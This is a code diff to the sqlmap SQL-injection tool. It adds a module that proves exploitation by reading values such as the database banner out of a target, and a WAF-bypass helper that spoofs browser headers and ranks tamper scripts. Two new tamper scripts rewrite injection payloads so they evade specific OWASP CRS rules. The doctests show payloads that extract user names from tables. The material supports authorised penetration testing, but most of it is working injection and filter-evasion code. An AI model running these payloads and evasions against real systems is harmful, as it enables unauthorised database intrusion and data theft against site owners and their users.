@@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os + +from lib.core.common import Backend +from lib.core.common import average +from lib.core.common import openFile +from lib.core.common import randomInt +from lib.core.common import stdev +from lib.core.common import unArrayizeValue +from lib.core.common import urldecode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import EXPECTED +from lib.core.enums import HTTPMETHOD +from lib.core.enums import PAYLOAD +from lib.core.enums import PLACE +from lib.core.settings import INFERENCE_MARKER +from lib.core.settings import SLEEP_TIME_MARKER +from lib.request.inject import getValue + +# how many times a true/false condition is re-evaluated to demonstrate repeatability (kills false positives) +PROVE_REPETITIONS = 5 + +# comparison knobs that decide true/false at request time (lib/request/comparison.py reads these globals, +# not injection.conf); they must be re-pointed at the injection being proven or the oracle returns None +_COMPARISON_ATTRS = ("string", "notString", "regexp", "code", "textOnly", "titles") + +# width the field labels are padded to, so the values line up in a clean column +_LABEL_WIDTH = 9 + + +def _field(label, value): + """ + Renders one 'Label: value' line (value column aligned), with any extra list items as continuation + lines indented under the value. + """ + + lines = list(value) if isinstance(value, (list, tuple)) else [value] + indent = " " * (_LABEL_WIDTH + 2) + retVal = "%s:%s%s" % (label, " " * (_LABEL_WIDTH - len(label) + 1), lines[0] if lines else "") + for extra in lines[1:]: + retVal += "\n%s%s" % (indent, extra) + return retVal + + +def _activateInjection(injection): + """ + Points the global comparison configuration (and kb.injection) at the injection being proven, so the + boolean oracle / data retrieval use that injection's own distinguishing signal regardless of what the + globals drifted to during enumeration. Returns the previous state for restoration. + """ + + saved = dict((_, getattr(conf, _)) for _ in _COMPARISON_ATTRS) + saved["injection"] = kb.injection + + for attr in _COMPARISON_ATTRS: + setattr(conf, attr, getattr(injection.conf, attr, None)) + kb.injection = injection + + return saved + + +def _restoreInjection(saved): + kb.injection = saved.pop("injection") + for attr, value in saved.items(): + setattr(conf, attr, value) + + +def _booleanOracle(expression): + """ + Evaluates a boolean expression strictly through the boolean (inferential) technique. UNION/error are + forced off on purpose: for a multi-technique injection getValue() would try those first, and a WAF/IPS + that blocks their function-heavy payloads makes them return None, which (with expectingNone) short- + circuits the whole call before the boolean technique is ever reached - the real cause of a 0/0 reading. + """ + + return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=True, union=False, error=False, time=False) + + +def _signalArtifacts(expression): + """ + Evaluates 'expression' through the boolean oracle and reads back the (HTTP code, page ) of the + response it produced (queryPage stores both in thread data), so the boolean proof can quote the actual + TRUE/FALSE codes and titles rather than a generic flag. Returns (None, None) on any error. + """ + + from lib.core.common import extractRegexResult, getCurrentThreadData + from lib.core.settings import HTML_TITLE_REGEX + + try: + _booleanOracle(expression) + threadData = getCurrentThreadData() + return threadData.lastCode, (extractRegexResult(HTML_TITLE_REGEX, threadData.lastPage or "") or "").strip() + except Exception: + return None, None + + +def _proveBoolean(injection): + """ + Demonstrates deterministic boolean control, rendered with the distinguishing signal sqlmap already + auto-selected (--string / --code / --title), repeated to show it is stable (not a fluke). The signal + line quotes the actual distinguishing artifact: the matched string, the two HTTP codes, or the two + page titles - so a reader sees exactly what tells TRUE from FALSE. + """ + + retVal = [] + n = randomInt() + + trues = sum(1 for _ in range(PROVE_REPETITIONS) if _booleanOracle("%d=%d" % (n, n))) + falses = sum(1 for _ in range(PROVE_REPETITIONS) if _booleanOracle("%d=%d" % (n, n + 1)) is False) + + line = "condition %d=%d returns TRUE (%d/%d) while %d=%d returns FALSE (%d/%d)" % (n, n, trues, PROVE_REPETITIONS, n, n + 1, falses, PROVE_REPETITIONS) + if trues == PROVE_REPETITIONS and falses == PROVE_REPETITIONS: + line += ", repeatably" # only claim repeatability when every repetition agreed + retVal.append(line) + + trueCode = trueTitle = falseCode = falseTitle = None + if injection.conf.code or injection.conf.titles: # fetch the real artifacts only when the signal needs them + trueCode, trueTitle = _signalArtifacts("%d=%d" % (n, n)) + falseCode, falseTitle = _signalArtifacts("%d=%d" % (n, n + 1)) + + if injection.conf.string: + retVal.append("the response contains %s only when the condition is TRUE" % repr(injection.conf.string).lstrip('u')) + elif injection.conf.notString: + retVal.append("the response contains %s only when the condition is FALSE" % repr(injection.conf.notString).lstrip('u')) + elif injection.conf.code: + if trueCode and falseCode and trueCode != falseCode: + retVal.append("the response returns HTTP %s when the condition is TRUE and HTTP %s when it is FALSE" % (trueCode, falseCode)) + else: + retVal.append("the response returns HTTP %s only when the condition is TRUE (a different code otherwise)" % injection.conf.code) + elif injection.conf.titles: + if trueTitle and falseTitle and trueTitle != falseTitle: + retVal.append("the page title is %s when the condition is TRUE and %s when it is FALSE" % (repr(trueTitle).lstrip('u'), repr(falseTitle).lstrip('u'))) + else: + retVal.append("the page <title> differs between the TRUE and FALSE responses") + else: + retVal.append("the TRUE response matches the original page while the FALSE one differs (content similarity)") + + return retVal + + +def _proveTime(injection): + """ + Demonstrates time-based blind in plain IT language (jitter / latency / controlled delay), keeping the + statistics under the hood. Where the payload uses a parameterizable delay (SLEEP(n)/pg_sleep(n)/WAITFOR), + it sweeps the injected delay (0 / T / 2T seconds) and shows the response time tracks it ~1:1 - a controlled + delay that network latency or a slow page cannot reproduce. Otherwise (heavy-query delays) it falls back to + a baseline-vs-jitter statement. + """ + + from lib.core.agent import agent + from lib.core.common import getCurrentThreadData, popValue, pushValue + from lib.request.connect import Connect as Request + + retVal = [] + stype = PAYLOAD.TECHNIQUE.TIME if PAYLOAD.TECHNIQUE.TIME in injection.data else PAYLOAD.TECHNIQUE.STACKED + vector = (injection.data.get(stype) or {}).get("vector") + + def _baselineStatement(): + baseline = kb.responseTimes.get(kb.responseTimeMode) or [] + if len(baseline) >= 2: + return "a TRUE condition delays the response well beyond the target's normal latency ~%.3fs (jitter ~%.3fs), repeatably" % (average(baseline), stdev(baseline)) + return "a TRUE condition delays the response well beyond the target's normal latency and jitter, repeatably" + + if not (vector and SLEEP_TIME_MARKER in vector): + retVal.append(_baselineStatement()) + return retVal + + n = randomInt() + base = conf.timeSec or 5 + measurements = [] + + benign = [] + for _ in range(3): + try: + Request.queryPage(timeBasedCompare=True, raise404=False, silent=True) + benign.append(getCurrentThreadData().lastQueryDuration) + except Exception: + pass + for k in (0, base, 2 * base): + pushValue(conf.timeSec) + conf.timeSec = k + try: + query = agent.suffixQuery(agent.prefixQuery(vector.replace(INFERENCE_MARKER, "%d=%d" % (n, n)))) + Request.queryPage(agent.payload(newValue=query), timeBasedCompare=True, raise404=False, silent=True) + measurements.append((k, getCurrentThreadData().lastQueryDuration)) + except Exception: + measurements.append((k, None)) + finally: + conf.timeSec = popValue() + + if any(d is None for _, d in measurements): + retVal.append(_baselineStatement()) + return retVal + + d0, dT, d2T = (measurements[0][1], measurements[1][1], measurements[2][1]) + baseAvg = average(benign) if benign else d0 + baseStd = stdev(benign) if len(benign) >= 2 else 0.0 + + # only claim 1:1 scaling if the measurements actually track the injected seconds: 0s stays near baseline, + # Ts ~ T, 2Ts ~ 2T, monotonic. A heavy-query delay (e.g. SQLite RANDOMBLOB) also rides [SLEEPTIME] but + # does NOT scale linearly, so it must NOT be rendered as 1:1 (its sweep is noisy / non-monotonic) + linear = d0 < max(0.5, base * 0.5) and abs(dT - base) <= base * 0.5 and abs(d2T - 2 * base) <= base * 0.6 and d2T > dT + + if linear: + retVal.append("normal response ~%.3fs (jitter ~%.3fs); injected delay %s" % (baseAvg, baseStd, " ".join("%ds -> %.2fs" % (k, d) for k, d in measurements))) + retVal.append("the response slows ~1:1 with the injected delay - a controlled delay that network latency or a slow page cannot reproduce (the 0s case returns at normal speed)") + else: + retVal.append("a TRUE condition makes the response take ~%.2fs versus ~%.3fs normal (jitter ~%.3fs), repeatably" % (max(dT, d2T), baseAvg, baseStd)) + retVal.append("a FALSE condition returns at normal speed - a sustained delay neither network latency nor a slow page reproduces") + + return retVal + + +def _retrieveProof(): + """ + Reads values back through the injection to prove it - DBMS-agnostic, weakest-to-strongest: + + 1. a random arithmetic product (e.g. 48391*60128): every SQL engine evaluates it, it needs no + table/function/FROM (valid even on Oracle), so its WAF surface is tiny - yet the operands are + random, so reading the exact product back proves the back-end actually executed injected SQL + (not a reflected constant); + 2. the DBMS banner: a real datum the application never returns on its own (the strongest proof). + + Whatever evasion the run already adopted (tamper scripts) applies here too - this is not tied to any one + DBMS or tamper. Returns a list of (label, text) rungs; both, one, or none may be present. + """ + + from lib.request import inject + + retVal = [] + + a, b = randomInt(4), randomInt(4) # 4-digit operands: product stays < 2^31 so it never overflows a 32-bit INT (e.g. PostgreSQL int4), yet is unguessable + try: + result = inject.getValue("%d*%d" % (a, b), expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS, resumeValue=False, suppressOutput=True) + except Exception: + result = None + if result is not None and ("%s" % result).strip() == str(a * b): + retVal.append(("Computed", "%d*%d = %d returned by the back-end - it executed the injected SQL (works on any DBMS)" % (a, b, a * b))) + + label = value = None + for requested, candidate, lbl in ( # reuse a value the user's own switches already pulled + (conf.getBanner, getattr(kb.data, "banner", None), "back-end DBMS banner"), + (conf.getCurrentUser, getattr(kb.data, "currentUser", None), "current database user"), + (conf.getCurrentDb, getattr(kb.data, "currentDb", None), "current database"), + ): + if requested and candidate: + label, value = lbl, unArrayizeValue(candidate) + break + + if value is None: + dbms = Backend.getIdentifiedDbms() + banner = getattr(queries.get(dbms), "banner", None) if dbms else None + query = getattr(banner, "query", None) if banner else None + if query: + try: + value = unArrayizeValue(inject.getValue(query, safeCharEncode=False, suppressOutput=True)) + label = "back-end DBMS banner" + except Exception: + value = None + + if value: + retVal.append(("Retrieved", "%s %s - a real value read out of the back-end (the strongest proof)" % (label, repr(value).lstrip('u')))) + + return retVal + + +def proveExploitation(): + """ + Renders a report-grade, best-effort demonstration of exploitation for the confirmed injection point + (option '--prove'), in the same style as sqlmap's injection-point summary so it reads naturally: the + target URL and the confirmed injection point (parameter / type / title / payload), then the strongest + proof first - an actual value read out of the back-end (drilling from the plain read to a more evasive + one so a WAF/IPS does not stop it) - backed by a deterministic boolean differential (rendered with the + distinguishing --string/--code/--title signal) or a statistical time-based demonstration. Written both + to stdout and to '<output>/proof.txt'. + """ + + if not kb.injections or not any(getattr(_, "place", None) for _ in kb.injections): + return + + injection = kb.injection if getattr(kb.injection, "place", None) else kb.injections[0] + + saved = _activateInjection(injection) + try: + if PAYLOAD.TECHNIQUE.BOOLEAN in injection.data: + stype = PAYLOAD.TECHNIQUE.BOOLEAN + proof = _proveBoolean(injection) + elif PAYLOAD.TECHNIQUE.TIME in injection.data or PAYLOAD.TECHNIQUE.STACKED in injection.data: + stype = PAYLOAD.TECHNIQUE.TIME if PAYLOAD.TECHNIQUE.TIME in injection.data else PAYLOAD.TECHNIQUE.STACKED + proof = _proveTime(injection) + elif PAYLOAD.TECHNIQUE.ERROR in injection.data: + stype = PAYLOAD.TECHNIQUE.ERROR + proof = ["the back-end error message returns the requested value directly"] + elif PAYLOAD.TECHNIQUE.UNION in injection.data: + stype = PAYLOAD.TECHNIQUE.UNION + proof = ["the requested value is rendered inside the application response"] + else: + stype = next(iter(injection.data), None) + proof = [] + + rungs = _retrieveProof() + finally: + _restoreInjection(saved) + + from lib.core.agent import agent + + target = conf.url or "" + if conf.parameters.get(PLACE.GET) and "?" not in target: # spell out the full GET target, not just the path + target += "?%s" % conf.parameters[PLACE.GET] + + paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else injection.place + sdata = injection.data.get(stype) + + fields = [_field("Target", target)] + if conf.parameters.get(PLACE.POST): + fields.append(_field("Data", conf.parameters[PLACE.POST])) + fields.append(_field("Parameter", "%s (%s)" % (injection.parameter, paramType))) + if sdata is not None: + fields.append(_field("Technique", PAYLOAD.SQLINJECTION[stype])) + if sdata.payload: + payload = urldecode(agent.adjustLateValues(sdata.payload), unsafe="&", spaceplus=(injection.place != PLACE.GET and kb.postSpaceToPlus)) + fields.append(_field("Payload", payload)) + if proof: + fields.append(_field("Proof", proof)) + if rungs: + for label, text in rungs: + fields.append(_field(label, text)) + else: + fields.append(_field("Retrieved", "(no value could be read back; the proof above still confirms exploitation)")) + + data = "\n".join(fields) + header = "sqlmap proved exploitation of the following injection point" + conf.dumper.string(header, data) + + try: + path = os.path.join(conf.outputPath or ".", "proof.txt") + with openFile(path, "w+") as f: + f.write("%s:\n---\n%s\n---\n" % (header, data)) + logger.info("proof of exploitation written to '%s'" % path) + except Exception: + pass diff --git a/lib/utils/wafbypass.py b/lib/utils/wafbypass.py new file mode 100644 index 000000000..f50fea9f5 --- /dev/null +++ b/lib/utils/wafbypass.py @@ -0,0 +1,156 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import base64 +import json +import os +import struct +import sys + +from lib.core.common import fetchRandomAgent +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import paths +from lib.core.enums import HTTP_HEADER +from lib.core.enums import PLACE +from lib.core.settings import WAF_BYPASS_HTTP_HEADERS +from lib.core.settings import WAF_BYPASS_TAMPERS + + +def neutralizeFingerprint(): + """ + Makes the request look like a real browser (random non-scanner User-Agent from the canonical + 'txt/user-agents.txt' - the same source as switch '--random-agent' - plus browser Accept/Accept-Language), + used by automatic WAF-bypass. The per-request User-Agent is sourced from conf.parameters[PLACE.USER_AGENT] + (queryPage passes it explicitly, overriding conf.agent), so that is the authoritative knob; conf.agent + and the HTTP header list are updated too. Returns the previous state so the change can be reverted. + """ + + saved = (conf.agent, conf.httpHeaders, conf.parameters.get(PLACE.USER_AGENT)) + + userAgent = fetchRandomAgent() + + conf.agent = userAgent + if PLACE.USER_AGENT in conf.parameters: + conf.parameters[PLACE.USER_AGENT] = userAgent + + overrides = dict(((HTTP_HEADER.USER_AGENT, userAgent),) + tuple(WAF_BYPASS_HTTP_HEADERS)) + upper = dict((_.upper(), _) for _ in overrides) + headers, seen = [], set() + for header, hvalue in conf.httpHeaders: + if header.upper() in upper: + headers.append((header, overrides[upper[header.upper()]])) + seen.add(header.upper()) + else: + headers.append((header, hvalue)) + for header, hvalue in overrides.items(): + if header.upper() not in seen: + headers.append((header, hvalue)) + conf.httpHeaders = headers + + return saved + +# identYwaf encodes each fingerprint as a packed array of 16-bit words, one per provocation +# vector, where the LOW bit marks whether that vector was blocked (lib/../identywaf/identYwaf.py: +# struct.pack(">H", (hash << 1) | blocked)). Decoding the bundled per-WAF signatures therefore +# yields, for free, which constructs a known WAF actually blocks - an empirical prior for picking +# bypass tampers. The two indices below (from data.json "payloads") are the ones we key decisions +# on: comment-obfuscated payloads (whether comment-insertion tampers stand any chance). +_IDENTYWAF_COMMENT_VECTORS = (2, 3, 13) # "1/**/AND/**/1", "1/*0AND*/1", "1/**/UNION/**/SELECT.../information_schema.*" + +_DATA = None + + +def _data(): + global _DATA + if _DATA is None: + path = os.path.join(paths.SQLMAP_ROOT_PATH, "thirdparty", "identywaf", "data.json") + with open(path, "rb") as f: + _DATA = json.loads(f.read().decode("utf-8")) + return _DATA + + +def identYwafBlockedVectors(wafName): + """ + Returns the set of provocation-vector indices that the given (identYwaf) WAF blocks, decoded + from its bundled blind signatures (majority vote across signature variants). Empty set if the + WAF/signatures are unknown. + + >>> isinstance(identYwafBlockedVectors("cloudflare"), set) + True + """ + + retVal = set() + + wafs = _data().get("wafs", {}) + info = wafs.get(wafName) or wafs.get((wafName or "").lower()) + if not info: + return retVal + + expected = len(_data().get("payloads", [])) + counts, total = {}, 0 + for signature in info.get("signatures", []): + try: + raw = base64.b64decode(signature.split(':', 1)[-1]) + except Exception: + continue + words = struct.unpack(">%dH" % (len(raw) // 2), raw) if len(raw) >= 2 else () + if len(words) != expected: # only consider signatures over the current vector set + continue + total += 1 + for index, word in enumerate(words): + if word & 1: + counts[index] = counts.get(index, 0) + 1 + + if total: + retVal = set(index for index, c in counts.items() if c * 2 >= total) # blocked in a majority of variants + + return retVal + + +def candidateTampers(identifiedWafs=None): + """ + Returns the ordered list of candidate tamper-script names for automatic WAF bypass: the + empirically-ranked WAF_BYPASS_TAMPERS, with comment-insertion camouflage pruned when the + identified WAF is known to block comment-obfuscated payloads (so requests aren't wasted on + tampers that can't help). Semantics (and DBMS compatibility) are verified at runtime by + re-running detection through each candidate, so no DBMS pre-filtering is needed here. + + >>> "between" in candidateTampers() + True + >>> "equaltolike" in candidateTampers() + True + """ + + retVal = list(WAF_BYPASS_TAMPERS) + + blocked = set() + for waf in (identifiedWafs or []): + blocked |= identYwafBlockedVectors(waf) + + if blocked and any(_ in blocked for _ in _IDENTYWAF_COMMENT_VECTORS): + retVal = [_ for _ in retVal if not _.startswith("space2") and _ != "versionedkeywords"] + + return retVal + + +def loadTamper(name): + """ + Imports a tamper script by name from the tamper directory and returns its 'tamper' function + (or None if missing). Mirrors the loader in option._setTamperingFunctions, for runtime use. + """ + + dirname = paths.SQLMAP_TAMPER_PATH + if dirname not in sys.path: + sys.path.insert(0, dirname) + + module = __import__(str(name)) + function = getattr(module, "tamper", None) + if function is not None: + function.__name__ = name + + return function diff --git a/tamper/blindbinary.py b/tamper/blindbinary.py new file mode 100644 index 000000000..41f0d7bd7 --- /dev/null +++ b/tamper/blindbinary.py @@ -0,0 +1,114 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def _balancedEnd(payload, start): + """Index of the ')' matching the '(' at payload[start] (or -1).""" + depth = 0 + idx = start + while idx < len(payload): + if payload[idx] == '(': + depth += 1 + elif payload[idx] == ')': + depth -= 1 + if depth == 0: + return idx + idx += 1 + return -1 + +def _reshape(payload, opener, tail, build): + """Replace every 'opener(<balanced query>)<tail>' with build(query, tail-match).""" + retVal = payload + pos = 0 + while True: + match = re.search(opener, retVal[pos:]) + if not match: + break + start = pos + match.start() + cursor = pos + match.end() # should sit on the '(' of the query argument + if cursor >= len(retVal) or retVal[cursor] != '(': + pos = pos + match.end() + continue + end = _balancedEnd(retVal, cursor) + if end < 0: + pos = pos + match.end() + continue + query = retVal[cursor:end + 1] # '(<query>)' + rest = re.match(tail, retVal[end + 1:]) + if not rest: + pos = pos + match.end() + continue + replacement = build(query, rest) + retVal = retVal[:start] + replacement + retVal[end + 1 + rest.end():] + pos = start + len(replacement) + return retVal + +def tamper(payload, **kwargs): + """ + Rewrites blind single-character reads into a firewall-transparent, byte-ordered comparison that + sheds the function names anomaly-scoring WAFs key on: + + * MySQL: ORD(MID((<q>),<p>,1))><n> + -> RIGHT(LEFT((<q>),<p>),(<p><=CHAR_LENGTH((<q>))))>BINARY 0x<nn> + * SQL Server: UNICODE(SUBSTRING((<q>),<p>,1))><n> (also ASCII(SUBSTRING(...))) + -> CAST(RIGHT(LEFT((<q>),<p>),CASE WHEN <p><=LEN((<q>)) THEN 1 ELSE 0 END) AS VARBINARY)>0x<nn> + + Requirement: + * MySQL or Microsoft SQL Server + + Notes: + * Bypasses anomaly-scoring WAFs (e.g. OWASP CRS) that score the function names + ORD/MID/ASCII/SUBSTRING/UNICODE (rule 942151) and the function-comparison shape (942190). + LEFT/RIGHT are not in those blocklists, so the cumulative score collapses (often to 0) while + the single-character, byte-ordered semantics of the bisection are preserved. + * MySQL 'BINARY' / SQL Server '... AS VARBINARY' force a byte (case- and accent-sensitive) + comparison, so extraction stays exact under a case-insensitive default collation. Both use a + native hex literal (0x<nn>), so nothing needs string-escaping. + * The character count is guarded (1 inside the string, 0 past its end), so a position beyond the + end yields RIGHT(...,0)='' which compares below every byte - the NULL terminator that stops + extraction, exactly like the original. A constant 1 would keep returning the last character + forever and never terminate. + + >>> tamper('1 AND ORD(MID((SELECT IFNULL(CAST(name AS NCHAR),0x20) FROM users ORDER BY id LIMIT 0,1),5,1))>71') + '1 AND RIGHT(LEFT((SELECT IFNULL(CAST(name AS NCHAR),0x20) FROM users ORDER BY id LIMIT 0,1),5),(5<=CHAR_LENGTH((SELECT IFNULL(CAST(name AS NCHAR),0x20) FROM users ORDER BY id LIMIT 0,1))))>BINARY 0x47' + >>> tamper('1 AND ORD(MID((SELECT 1),1,1))>0') + '1 AND RIGHT(LEFT((SELECT 1),1),(1<=CHAR_LENGTH((SELECT 1))))>BINARY 0x00' + >>> tamper('1 AND 5141=5141') + '1 AND 5141=5141' + >>> tamper('1 AND ORD(MID((SELECT 1),1,1))<65') + '1 AND RIGHT(LEFT((SELECT 1),1),(1<=CHAR_LENGTH((SELECT 1))))<BINARY 0x41' + >>> tamper('1 AND UNICODE(SUBSTRING((SELECT TOP 1 name FROM users),3,1))>64') + '1 AND CAST(RIGHT(LEFT((SELECT TOP 1 name FROM users),3),CASE WHEN 3<=LEN((SELECT TOP 1 name FROM users)) THEN 1 ELSE 0 END) AS VARBINARY)>0x40' + """ + + if not payload: + return payload + + def _mysql(query, rest): + position, operator, value = rest.group(1), rest.group(2), int(rest.group(3)) + return "RIGHT(LEFT(%s,%s),(%s<=CHAR_LENGTH(%s)))%sBINARY 0x%02x" % (query, position, position, query, operator, value) + + def _mssql(query, rest): + position, operator, value = rest.group(1), rest.group(2), int(rest.group(3)) + # shed sqlmap's SQL Server retrieval wrapper 'ISNULL(CAST(<x> AS NVARCHAR(<n>)),CHAR(<m>))' -> '(<x>)': + # CHAR()/CAST are themselves scored by ASCII/SUBSTRING-class WAFs (unlike MySQL's 0x20 hex), so for a + # clean inner query the whole read goes function-free (NULLs then read as end-of-string) + query = re.sub(r"(?i)ISNULL\(CAST\((.+?) AS NVARCHAR\(\d+\)\),\s*CHAR\(\d+\)\)", r"(\1)", query) + return "CAST(RIGHT(LEFT(%s,%s),CASE WHEN %s<=LEN(%s) THEN 1 ELSE 0 END) AS VARBINARY)%s0x%02x" % (query, position, position, query, operator, value) + + comma_tail = r"\s*,\s*(\d+)\s*,\s*1\)\)\s*(>=|<=|>|<|=)\s*(\d+)" + retVal = _reshape(payload, r"(?i)ORD\(MID\(", comma_tail, _mysql) + retVal = _reshape(retVal, r"(?i)(?:UNICODE|ASCII)\(SUBSTRING\(", comma_tail, _mssql) + return retVal diff --git a/tamper/infoschema2innodb.py b/tamper/infoschema2innodb.py new file mode 100644 index 000000000..053242cc5 --- /dev/null +++ b/tamper/infoschema2innodb.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Rewrites MySQL table-enumeration off 'information_schema.tables' onto the InnoDB statistics + table 'mysql.innodb_table_stats' (table_schema -> database_name), to dodge WAF rules that flag + the 'information_schema' name (e.g. OWASP CRS 942140 'common DB names') + + Requirement: + * MySQL + + Notes: + * 'information_schema' is a hard token for anomaly-scoring WAFs (CRS rule 942140), so table + enumeration is blocked even when the single-character read itself is not. 'mysql.innodb_table_stats' + exposes (database_name, table_name) for every InnoDB table and is NOT on those blocklists, so the + same enumeration passes. Pair with 'blindbinary' to also get the per-character read through. + * Only InnoDB tables are listed (no MyISAM/MEMORY tables, no views) and SELECT on the 'mysql' + schema is required (granted to root and most admin users). + * Column enumeration (information_schema.columns) has no such InnoDB equivalent; provide the + columns explicitly (-C) when behind such a WAF, or fall back to common-columns brute forcing. + + >>> tamper('SELECT table_name FROM information_schema.tables WHERE table_schema=0x6d6173746572 LIMIT 0,1') + 'SELECT table_name FROM mysql.innodb_table_stats WHERE database_name=0x6d6173746572 LIMIT 0,1' + >>> tamper('SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x61') + 'SELECT COUNT(table_name) FROM mysql.innodb_table_stats WHERE database_name=0x61' + >>> tamper('1 AND 1=1') + '1 AND 1=1' + """ + + retVal = payload + + if retVal and re.search(r"(?i)information_schema\.tables", retVal): + retVal = re.sub(r"(?i)information_schema\.tables", "mysql.innodb_table_stats", retVal) + retVal = re.sub(r"(?i)table_schema", "database_name", retVal) + + return retVal diff --git a/tests/test_wafbypass.py b/tests/test_wafbypass.py new file mode 100644 index 000000000..9e69ef25a --- /dev/null +++ b/tests/test_wafbypass.py @@ -0,0 +1,81 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission + +T1 - automatic WAF-bypass tamper selection (lib/utils/wafbypass.py). These cover the pure, +offline pieces: the identYwaf blind-signature decoder (which provocation vectors a known WAF +blocks), the data-ranked / DBMS-filtered / identYwaf-pruned candidate ordering, and the runtime +tamper loader. The end-to-end "adopt a tamper that restores detection" behaviour is exercised by +the --auto-tamper vuln-test case (lib/core/testing.py) against the vulnserver WAF emulator. +""" + +import os +import sys +import unittest + +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +from _testutils import bootstrap +bootstrap() + +from lib.utils.wafbypass import candidateTampers, identYwafBlockedVectors, loadTamper + + +class TestIdentYwafDecoder(unittest.TestCase): + def test_known_waf_decodes_to_blocked_vectors(self): + # cloudflare has bundled blind signatures -> a non-trivial set of blocked vector indices, + # all within range of the 45 provocation vectors + blocked = identYwafBlockedVectors("cloudflare") + self.assertTrue(len(blocked) > 5) + self.assertTrue(all(isinstance(_, int) and 0 <= _ < 45 for _ in blocked)) + + def test_unknown_waf_is_empty(self): + self.assertEqual(identYwafBlockedVectors("definitely-not-a-real-waf"), set()) + self.assertEqual(identYwafBlockedVectors(None), set()) + + +class TestCandidateRanking(unittest.TestCase): + def test_structural_first(self): + cands = candidateTampers() + # the empirically strongest structural substitutions lead, ahead of camouflage + self.assertEqual(cands[0], "equaltolike") + self.assertIn("between", cands[:3]) + self.assertLess(cands.index("between"), cands.index("space2comment")) + + def test_no_dbms_prefiltering(self): + # DBMS compatibility is verified at runtime (detection re-run through the tamper), not here, + # so the full candidate set is offered regardless of any guessed back-end DBMS + cands = candidateTampers() + self.assertIn("versionedkeywords", cands) + self.assertIn("space2hash", cands) + self.assertIn("between", cands) + + def test_identYwaf_prior_prunes_camouflage(self): + # a WAF whose profile blocks comment-obfuscated vectors should have comment-insertion + # camouflage pruned (it cannot help there), while structural candidates survive + base = candidateTampers() + pruned = candidateTampers(identifiedWafs=["cloudflare"]) + self.assertIn("equaltolike", pruned) + self.assertNotIn("space2comment", pruned) + self.assertLessEqual(len(pruned), len(base)) + + +class TestLoadTamper(unittest.TestCase): + def test_loads_and_applies(self): + fn = loadTamper("between") + self.assertTrue(callable(fn)) + self.assertEqual(fn.__name__, "between") + # the loaded function is the real tamper transform + self.assertEqual(fn(payload="1 AND A>B"), "1 AND A NOT BETWEEN 0 AND B") + + def test_missing_returns_none_or_raises(self): + # a non-existent script must not silently yield a bogus callable + try: + self.assertIsNone(loadTamper("no_such_tamper_script_xyz")) + except Exception: + pass # an import error is also acceptable; what matters is no fake function + + +if __name__ == "__main__": + unittest.main()